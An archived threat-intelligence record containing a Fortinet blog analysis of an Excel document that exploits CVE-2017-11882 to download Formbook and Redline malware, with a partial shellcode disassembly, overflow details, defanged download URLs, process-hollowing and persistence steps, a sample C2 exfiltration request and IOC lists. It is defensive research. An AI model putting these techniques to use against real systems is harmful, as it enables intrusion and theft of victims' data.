{
	"id": "26e5bb6f-3786-455a-accb-e6182ef234cc",
	"created_at": "2026-04-06T01:31:17.125857Z",
	"updated_at": "2026-04-10T03:22:49.726293Z",
	"deleted_at": null,
	"sha1_hash": "ee5cb265b63f4e956d5580621388140247f9e707",
	"title": "Excel Document Delivers Multiple Malware By Exploiting CVE-2017-11882 – Part I | Fortinet Blog",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 684890,
	"plain_text": "Excel Document Delivers Multiple Malware By Exploiting CVE-2017-\r\n11882 – Part I | Fortinet Blog\r\nBy Xiaopeng Zhang\r\nPublished: 2022-09-19 · Archived: 2026-04-06 00:28:54 UTC\r\nFortiGuard Labs recently captured an Excel document with an embedded file in the wild. Of course, we do this all the time.\r\nWhat caught my eye this time is that the embedded file name is randomized, which drove me to want to analyze this Excel\r\ndocument. After some quick research on the file, I learned that it exploits a particular vulnerability —CVE-2017-11882—to\r\nexecute malicious code to deliver and execute malware on a victim’s device.\r\nIn this analysis, you will see how the crafted Excel document exploits CVE-2017-11882, what it does when exploiting the\r\nvulnerability, what malware families it can download onto a victim’s device, and what malicious actions the perpetrators can\r\nconduct.\r\nAffected platforms: Microsoft Windows\r\nImpacted parties: Windows Users\r\nImpact: Control and Collect Sensitive Information from Victim’s Device.\r\nSeverity level: Critical\r\nDissect the Captured Excel Document\r\nThe captured Excel document is called “GAT412-IFF22.xlsx”. It is saved in OOXML format (Office Open XML, a zipped\r\nand XML-based file format) developed by Microsoft. By decompressing this file in an unzip program, as shown in Figure\r\n1.1, we can see the folder tree on the left and all files on the right. The last file, “xtgjls.4flk6W”, located in the sub-folder of\r\n“\\xl\\embeddings\\”, is the randomized embedded file.\r\nhttps://www.fortinet.com/blog/threat-research/excel-document-delivers-malware-by-exploiting-cve-2017-11882\r\nPage 1 of 14\n\nFigure 1.1 – The outline of the file structure inside the Excel document\nLet’s look at how the Excel program loads the embedded file. Figure 1.2 shows the content of the relevant files. They are\n“..\\xl\\ worksheets \\sheet1.xml” and its corresponding relationship file “..\\xl\\ worksheets\\_rels\\sheet1.rels”.\nFigure 1.2 - Display of how the Excel program loads the embedded file\nIt parses the XML data of “sheet1.xml” and obtains the Ole Object data, which looks like the following.\nr:id=“rId1” sets the relationship ID defined in file “sheet1.rels”, as shown in Figure 1.2. Its “target” attribute was set\nto the string “../embeddings/xtgjls.4flk6W,” which tells the Excel program where to load the Ole Object.\nautoLoad=“true” sets Excel to load the Ole Object automatically without prompting the victim.\nshapeId=“1907” tells Excel how to parse the data of “xtgjls.4flk6W”.\nAs you may know, CVE-2017-11882 is a vulnerability within “EQNEDT32.EXE” that can be exploited when processing\nspecially crafted equation data (formulas data). Equation data is imported in Excel documents as an embedded OLE object.\nIn this case, the Excel program uses COM (Component Object Model) objects to pass the equation data inside the file\n“xtgjls.4flk6W” to “EQNEDT32.EXE” to parse.\n “xtgjls.4flk6W” is saved in the Microsoft Compound File Binary format. There are two binary files in it,\n“rd8NsPZ44G0yvGbjKKpvH1QTwNU5u” and “[1]oLE10NATiVE”, as shown in Figure 1.3.\nhttps://www.fortinet.com/blog/threat-research/excel-document-delivers-malware-by-exploiting-cve-2017-11882\nPage 2 of 14\n\nFigure 1.3 – View of the crafted “xtgjls.4flk6W” file\r\n“[1]oLE10NATiVE” contains the crafted equation data, where the malicious shellcode will be executed in the vulnerable\r\n“EQNEDT32.EXE”.\r\nHow the CVE-2017-11882 is Exploited\r\nCopying null-terminated data into a local buffer without a proper length detection causes a stack buffer overflow that leads\r\nto arbitrary code execution. The affected local buffer is only 2CH bytes long relative to the function return address.\r\nTherefore, the function return address will be overridden if the copied data is more than 2CH bytes.\r\nFigure 2.1 – The content of “[1]oLE10NATiVE”\r\nThe highlighted block in Figure 2.1 is the null-terminated data being copied—30H bytes—while the last dword (0x42F72E)\r\n(marked with a red rectangle) is the data to override the function return address.\r\nhttps://www.fortinet.com/blog/threat-research/excel-document-delivers-malware-by-exploiting-cve-2017-11882\r\nPage 3 of 14\n\nFigure 2.2 – Stack Frame when stack buffer overflow occurred\r\nFigure 2.2 shows a screenshot of the stack frame of “EQNEDT32.EXE”, where the function return address was just\r\noverridden by 0x42F72E (the original address is 0x4115D8). Once the function returns, it will return to 0x42F72E to\r\nexecute a “ret” instruction, which pops a dword (0x18F350) into the EIP register from the top of the stack. The data starting\r\nfrom 0x18F350 is the shellcode from file “[1]oLE10NATiVE”. -The shellcode had already been copied onto the stack.\r\nBelow is a partial list of the shellcode at 0x18F350 in the stack.\r\n0018F350 BA BF782F03 mov edx,32F78BF\r\n0018F355 81C2 7D4416FD add edx,FD16447D\r\n0018F35B 8B32 mov esi,dword ptr ds:[edx]\r\n0018F35D 8B2E mov ebp,dword ptr ds:[esi]\r\n0018F35F BE 43FC3381 mov esi,8133FC43\r\n0018F364 81F6 F39B7581 xor esi,81759BF3\r\n0018F36A 8B0E mov ecx,dword ptr ds:[esi]\r\n0018F36C 55 push ebp\r\n0018F36D FFD1 call ecx           ;;;; \u003ckernel32.GlobalLock\u003e\r\nhttps://www.fortinet.com/blog/threat-research/excel-document-delivers-malware-by-exploiting-cve-2017-11882\r\nPage 4 of 14\n\n0018F36F 05 88FBAA47 add eax,47AAFB88\r\n0018F374 05 4BF65DB8 add eax,B85DF64B\r\n0018F379 FFE0 jmp eax         ;;;; jump to decrypt dynamic code\r\n0018F37B 022E add ch,byte ptr ds:[esi]\r\n0018F37D F742 00 00E76000 test dword ptr ds:[edx],60E700\r\n0018F384 04 F5 add al,F5\r\n[…]\r\nIt calls the API GlobalLock() to get a buffer address inside “EQNEDT32.EXE”‘s memory with the entire data of\r\n“[1]oLE10NATiVE”. It then calculates an offset of a piece of obfuscated code and executes it. It can then be used to decrypt\r\na set of dynamic codes and strings.\r\nThe decrypted code dynamically loads some APIs, such as ExpandEnvironmentStringsW(), URLDownloadToFileW(),\r\nWideCharToMultiByte(), WinExec(), and ExitProcess(). It then calls the API URLDownloadToFileW() to download an exe\r\nfile from a URL. \r\nFigure 2.3 – The malware is about to call the API URLDownloadToFileW()\r\nFigure 2.3 is a screenshot of a debugger that breaks at the API URLDownloadToFileW(). As you may notice, its second\r\nparameter is a URL of the file to be downloaded, which is a decrypted string—“hxxp[:]//lutanedukasi[.]co[.]id/wp-includes/Cikncbxlojqanjsfotzhopechujkgkeeyz.exe”. The third parameter of this API is adding the local file name to the\r\ndownloaded file, which is “C:\\Users\\{UserName}\\AppData\\Roaming\\word.exe”.\r\nNext, it calls the API WinExec() to start the downloaded file (“C:\\Users\\{UserName}\\AppData\\Roaming\\word.exe”). After\r\nthat, the malware starts on the victim’s machine. The last step of the shellcode is to call the API ExitProcess() to terminate\r\nhttps://www.fortinet.com/blog/threat-research/excel-document-delivers-malware-by-exploiting-cve-2017-11882\r\nPage 5 of 14\n\nthe exploited “EQNEDT32.EXE” process.\r\nUnfortunately, I was not able to obtain the downloaded file. Instead, I received a 404 error code from the website that the file\r\nwas no longer available. Nevertheless, after going through the malware sample logs, I found something useful about this\r\nwebsite that interested me.\r\nBased on the URL’s patterns, I found many samples using a similar URL to download malware, and from them, I learned\r\nthat the website was used to deliver two malware families, Formbook and Redline. Therefore, the missing download file is\r\nprobably either Formbook or Redline.\r\nThe following table lists what malware and relevant URLs that I’ve obtained from the logs. I will then pick one sample for\r\neach of the two malware families from the table to continue my analysis.\r\nMalware URLs\r\n“Formbook” hxxp[:]//lutanedukasi[.]co[.]id/wp-includes/lsbjqoyofgkmqbuleooykdekgopmtglvjl.exe\r\n“Formbook” hxxp[:]//lutanedukasi[.]co[.]id/wp-includes/ueNusTuRz84DVHA.exe                  \r\n“Formbook” hxxp[:]//lutanedukasi[.]co[.]id/wp-includes/linecol_v4.1.1.exe                   \r\n“Formbook” hxxp[:]//lutanedukasi[.]co[.]id/wp-includes/k2p5vFXxdMpidBJ.exe                  \r\n“Redline” hxxp[:]//lutanedukasi[.]co[.]id/wp-includes/almac.exe                            \r\n“Formbook” hxxp[:]//lutanedukasi[.]co[.]id/wp-includes/fmbj2.exe                            \r\n“Formbook” hxxp[:]//lutanedukasi[.]co[.]id/wp-includes/onshedy.exe                          \r\n“FormBook” hxxp[:]//lutanedukasi[.]co[.]id/wp-includes/fbfslispuuepzv0.exe                  \r\n“Redline” hxxp[:]//lutanedukasi[.]co[.]id/wp-includes/storj.exe                             \r\n“Redline” hxxp[:]//lutanedukasi[.]co[.]id/wp-includes/hAiNVxLRl3ayBcV.exe                  \r\nFormbook Malware\r\nhttps://www.fortinet.com/blog/threat-research/excel-document-delivers-malware-by-exploiting-cve-2017-11882\r\nPage 6 of 14\n\nI picked the “lsbjqoyofgkmqbuleooykdekgopmtglvjl.exe” file (being saved as “C:\\Users\\\r\n{UserName}\\AppData\\Roaming\\word.exe”) as an example to analyze. It is the latest Formbook sample in the malware\r\nsample logs.\r\n“FormBook” is well-known commercial malware. It has been sold as “malware-as-a-service” (MaaS) since 2016. It is\r\ndesigned to steal sensitive information from a victim’s device and control it using some Control Commands.\r\nIn this analysis, I will explain how this sample performs on the victim’s device.\r\nFormbook Downloader and Loader\r\nThe exe file was developed using Borland Delphi language. Based on my analysis, it is a Formbook downloader and loader.\r\nFormbook performs complicated techniques to prevent itself from being easily detected and analyzed. Let’s go on to see\r\nhow it does that.\r\nOnce it runs, it extracts a Dll file into memory from one of its Bitmap resources (named “BBOKK”), as shown in Figure 3.1.\r\nFigure 3.1 – A Dll file will be extracted from “BBOKK”\r\nWhen the main form’s FormCreate() function is called, it reads the Bitmap data from the Resource section and decrypts it\r\ninto a Dll file (referred to as “BBOKK” Dll). Next, it deploys the “BBOKK” Dll in memory, and its entry function is called\r\nat the end.\r\nThe “BBOKK” Dll file is another Delphi-compiled file. It starts a timer to run a timer function after sleeping 9 seconds by\r\ncalling an API timeSetEvent().\r\nThe purpose of the timer function is to download the Formbook payload and then execute it on the victim’s device.\r\nhttps://www.fortinet.com/blog/threat-research/excel-document-delivers-malware-by-exploiting-cve-2017-11882\r\nPage 7 of 14\n\nFigure 3.2 – Download the Formbook payload file\r\nFigure 3.2 is a screenshot of when “BBOKK” Dll downloads the Formbook payload file by calling the API\r\nInternetOpenUrlA(). Its second parameter is a URL to the file, as shown in memory. It was stored as an attachment on\r\nDiscord’s CDN (content delivery network).\r\nThe attacker encrypted and transformed this file many times to protect its payload file from being blocked and detected.\r\nAfter four decryption and data reversions, we could finally obtain the Formbook payload file, as shown in Figure 3.3.\r\nFigure 3.3 – Just decrypted Formbook payload file and its size in memory\r\nHollowed Process to Execute Formbook\r\nThere are three Windows process strings predefined inside “BBOKK” Dll, as seen below:\r\n“C:\\Windows\\System32\\calc.exe”\r\n“C:\\Windows\\System32\\rasphone.exe”\r\n“C:\\Windows\\System32\\cmd.exe”.\r\nhttps://www.fortinet.com/blog/threat-research/excel-document-delivers-malware-by-exploiting-cve-2017-11882\r\nPage 8 of 14\n\nThe malware randomly picks one process from them to perform a process hollowing attack. It first needs to create the\r\npicked process in a suspended state. Next, it must inject the Formbook payload file into its memory and deploy it. And\r\nfinally, it copies and creates a remote thread in the picked process whose thread function will execute the injected Formbook\r\nby calling its entry function.\r\nTo finish this, it calls a bunch of APIs, such as CreateProcessW(), VirtualAllocEx(), WriteProcessMemory(),\r\nCreateRemoteThread() and ReadProcessMemory().\r\nFigure 4.1 is a screenshot of a debugger showing where it breaks at API CreateProcessW() with certain parameters, like the\r\nrandom picked process (which was “C:\\Windows\\System32\\rasphone.exe” for this time) and the CreateFlags is 0x44, which\r\nis a flag combination of CREATE_SUSPENDED and IDLE_PRIORITY_CLASS.\r\nFigure 4.1 – Break at API CreateProcessW() to create a suspended process\r\nAfter this point, the Formbook payload file will run inside the random picked process.\r\nMaintaining Persistence on the Victim’s Device\r\n“BBOKK” Dll is in charge of establishing Formbook persistence on the victim’s device. Once it obtains the Formbook\r\npayload file, it creates a string value under the sub-key “HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run” of the\r\nsystem registry, as shown in Figure 5.1. \r\nFigure 5.1 – Formbook is added into the auto-run group of the system registry\r\nThe auto-run process is “C:\\Users\\Public\\Libraries\\foyoqjbsL.url”. This is an Internet Shortcut file (*.url) usually used to\r\nopen a website within a web browser. The “URL” property is the full path of a local file (which should be a website’s\r\naddress), as shown in Figure 5.2. It is “C:\\Users\\Public\\Libraries\\Lsbjqoyof.exe” which was copied from the\r\n“lsbjqoyofgkmqbuleooykdekgopmtglvjl.exe” file. As a result, Formbook will start when the system starts via the\r\n“foyoqjbsL.url” file. \r\nhttps://www.fortinet.com/blog/threat-research/excel-document-delivers-malware-by-exploiting-cve-2017-11882\r\nPage 9 of 14\n\nFigure 5.2 – The property of “foyoqjbsL.url”\r\nFormbook Payload\r\nI previously performed a deep analysis of another Formbook variant spread in a phishing campaign with an attached\r\nPowerPoint document. For detailed information regarding that Formbook sample, you can refer to  Part I, Part II, and Part\r\nIII.\r\nI compared the code, data structure, and features between the fresh variant and that previous one. I found no significant\r\nchanges between them.\r\nThe randomly picked process (like “rasphone.exe”) by “BBOKK” Dll plays the same role as the “AddInProcess32.exe”\r\nanalyzed in Part II of my previous analysis.\r\nThey both have the same data structures and features, such as:\r\nThe “Configuration Object”.\r\nIts “Anti-analysis Techniques”.\r\nInjecting Formbook into a Windows process via Explorer.exe as a central control program.\r\nInserting Formbook into target processes, like web browsers, email clients, IM clients, and FTP clients, from which it\r\nsteals sensitive information.\r\nUsing the C2 server’s control commands (“1” to “9”) to control the device and conduct extra tasks, like executing a\r\ngiven malware, upgrading Formbook, deleting keys/values from the system registry, rebooting/powering off the\r\ndevice, and more.\r\nhttps://www.fortinet.com/blog/threat-research/excel-document-delivers-malware-by-exploiting-cve-2017-11882\r\nPage 10 of 14\n\nThis fresh variant has a new C2 server list, which is decrypted before use. It has 143 encrypted strings, and 64 of the 143 are\r\nC2 servers. I wrote a script to decrypt all its strings inside Formbook. For your information, Figure 6.1 is a partial list of the\r\ndecrypted strings and C2 servers.\r\nFigure 6.1 – Partial decrypted strings from Formbook\r\nThe full list of C2 servers this variant carries has been added to the IOC section that locates at the end of this report.\r\nOnce Formbook needs to submit the stolen data to a C2 server, it encrypts the data and encodes it with a Base64 algorithm.\r\nFollowing is an example of the HTTP GET packet Formbook sent to its C2 server.\r\nhxxp[:]//www[.]waraporn[.]net/dy47/?\r\nRt=cJEPCFYxXhcTq\u0026nBZhXF=VgD07dflFaksGVxdFL46l5VyvbABpSxwWaaMvOL1tn3EVaDMwmxyqfSWThCs5+vZuoswEw==\r\nWhere:\r\n“www[.]waraporn[.]net” is the C2 server host.\r\n“dy47” comes from a decrypted constant string, “www.irolexwatchs.com/dy47/”.\r\nBase64 encoded string after “?” is the stolen data from the victim’s device.\r\nIn the next part of this analysis, I will pick one of the Redline samples from the above malware table to research and explain\r\nwhat it can do to the victim’s device.\r\nFortinet Protections\r\nhttps://www.fortinet.com/blog/threat-research/excel-document-delivers-malware-by-exploiting-cve-2017-11882\r\nPage 11 of 14\n\nFortinet customers are already protected from this FormBook variant with FortiGuard’s Web Filtering, IPS, and AntiVirus\r\nservices as follows:\r\nThe downloading URLs and C2 servers are rated as “Malicious Websites” by the FortiGuard Web Filtering service.\r\nThe vulnerability CVE-2017-11882 can be protected by IPS signature\r\nMS.Office.EQNEDT32.EXE.Equation.Parsing.Memory.Corruption.\r\nThe FortiGuard CDR (content disarm and reconstruction) service can disarm the embedded file inside the Excel document.\r\nThe FortiGuard AntiVirus service is supported by FortiGate, FortiMail, FortiClient, and FortiEDR. The Fortinet AntiVirus\r\nengine is a part of each of those solutions. As a result, customers who have these products with up-to-date protections are\r\nprotected.\r\nWe also suggest our readers go through the free NSE training: NSE 1 – Information Security Awareness, which has a\r\nmodule on Internet threats designed to help end users learn how to identify and protect themselves from phishing attacks.\r\nIOCs:\r\nURLs:\r\nhxxp[:]//lutanedukasi[.]co[.]id/wp-includes/Cikncbxlojqanjsfotzhopechujkgkeeyz.exe\r\nhxxp[:]//lutanedukasi[.]co[.]id/wp-includes/lsbjqoyofgkmqbuleooykdekgopmtglvjl.exe\r\nhttps[:]//cdn[.]discordapp[.]com/attachments/937614907917078588/1009001073970794576/Lsbjqoyofgkmqbuleooykdekgopmtgl\r\nFormbook C2 Server List:\r\n“valeloaiza[.]com”\r\n“nxmdta[.]quest”\r\n“yennft[.]com”\r\n“techwithnova[.]com”\r\n“newssmart[.]xyz”\r\n“devopstp[.]com”\r\n“trophies3d[.]co[.]uk”\r\n“helpagencia[.]online”\r\n“fineclocksandsoaps[.]com”\r\n“universerealtor[.]website”\r\n“hyriver[.]com”\r\n“xishangtao[.]com”\r\n“getyourhostingnow[.]com”\r\n“one-poker[.]com”\r\n“ry-cw[.]com”\r\n“colaye[.]us”\r\n“russellbanx[.]com”\r\n“rennentedieeinzige[.]uk”\r\n“heliconiaparadise[.]site”\r\n“234sportsagency[.]com”\r\n“tenaciouslee[.]com”\r\nhttps://www.fortinet.com/blog/threat-research/excel-document-delivers-malware-by-exploiting-cve-2017-11882\r\nPage 12 of 14\n\n“edenq[.]com”\r\n“thecreakykettle[.]net”\r\n“bedmate-ventricose[.]net”\r\n“andreas-setiarama[.]com”\r\n“advidd[.]com”\r\n“enerplus[.]uk”\r\n“cassavaproject[.]com”\r\n“cambriacr[.]com”\r\n“iserghini[.]com”\r\n“creativacr[.]com”\r\n“brandmarkenterprises[.]com”\r\n“uaepilator[.]store”\r\n“singhdeepak[.]space”\r\n“belicosocigars[.]com”\r\n“yysshh[.]top”\r\n“rekapllc[.]store”\r\n“fairblare[.]sbs”\r\n“bryar[.]top”\r\n“deniz2fotograf[.]online”\r\n“viproom108[.]com”\r\n“fullstackchannel[.]net”\r\n“emjghq[.]com”\r\n“theclientserver[.]xyz”\r\n“smartprotectproducts[.]store”\r\n“thebestconsultants[.]com”\r\n“453wow[.]com”\r\n“iwantcreativity[.]com”\r\n“excel-facile[.]online”\r\n“waraporn[.]net”\r\n“topdeckholidays[.]com”\r\n“slanguage[.]online”\r\n“mistergreekmeat[.]com”\r\n“bloombyz[.]store”\r\n“sparkmediaagency[.]xyz”\r\n“asdmohs18[.]website”\r\n“playersclub[.]site”\r\n“ariedejongtv[.]com”\r\n“jinchuansh[.]com”\r\n“affnewyork888s[.]com”\r\n“ere46[.]site”\r\n“wevlong[.]xyz”\r\n“toniotheharrison[.]net”\r\n“aroma4pets[.]com”   \r\nSample SHA-256\r\n[GAT412-IFF22.xlsx]\r\nhttps://www.fortinet.com/blog/threat-research/excel-document-delivers-malware-by-exploiting-cve-2017-11882\r\nPage 13 of 14\n\nD1EA94C241E00E8E59A7212F30A9117393F9E883D2B509E566505BC337C473E3\r\n[Formbook, lsbjqoyofgkmqbuleooykdekgopmtglvjl.exe]\r\nC7B7CC6B73B04E2CD7D026A69D47139770ACE5A92457DA0F0C058EE438251B18\r\nLearn more about Fortinet’s FortiGuard Labs threat research and global intelligence organization and Fortinet’s\r\nFortiGuard AI-powered Security Services portfolio. Sign up to receive our threat research blogs.\r\nSource: https://www.fortinet.com/blog/threat-research/excel-document-delivers-malware-by-exploiting-cve-2017-11882\r\nhttps://www.fortinet.com/blog/threat-research/excel-document-delivers-malware-by-exploiting-cve-2017-11882\r\nPage 14 of 14",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.fortinet.com/blog/threat-research/excel-document-delivers-malware-by-exploiting-cve-2017-11882"
	],
	"report_names": [
		"excel-document-delivers-malware-by-exploiting-cve-2017-11882"
	],
	"threat_actors": [
		{
			"id": "b740943a-da51-4133-855b-df29822531ea",
			"created_at": "2022-10-25T15:50:23.604126Z",
			"updated_at": "2026-04-10T02:00:05.259593Z",
			"deleted_at": null,
			"main_name": "Equation",
			"aliases": [
				"Equation"
			],
			"source_name": "MITRE:Equation",
			"tools": null,
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775439077,
	"ts_updated_at": 1775791369,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/ee5cb265b63f4e956d5580621388140247f9e707.pdf",
		"text": "https://archive.orkl.eu/ee5cb265b63f4e956d5580621388140247f9e707.txt",
		"img": "https://archive.orkl.eu/ee5cb265b63f4e956d5580621388140247f9e707.jpg"
	}
}